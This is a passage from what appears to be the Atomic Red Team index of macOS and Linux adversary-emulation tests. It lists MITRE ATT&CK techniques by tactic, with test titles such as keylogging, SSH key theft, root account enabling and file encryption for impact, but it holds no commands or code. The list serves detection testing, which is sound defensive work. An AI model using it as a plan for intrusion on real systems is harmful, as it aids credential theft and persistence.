- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #7: MacOS Swift Keylogger [macos]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #3: using Quicktime Player [macos]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #3: Execute commands from clipboard [macos]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1514 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #7: MacOS Swift Keylogger [macos]
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #3: Extract passwords with grep [macos, linux]
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1142 Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #8: List Safari Bookmarks on MacOS [macos]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #8: List macOS Firewall Rules [macos]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #7: Examine password policy - macOS [macos]
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #4: Change User Password via passwd [macos, linux]
- Atomic Test #5: Delete User via dscl utility [macos]
- Atomic Test #6: Delete User via sysadminctl utility [macos]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #6: Encrypt files using 7z utility - macOS [macos]
- Atomic Test #7: Encrypt files using openssl utility - macOS [macos]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
# execution
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1155 AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- T1559.003 XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
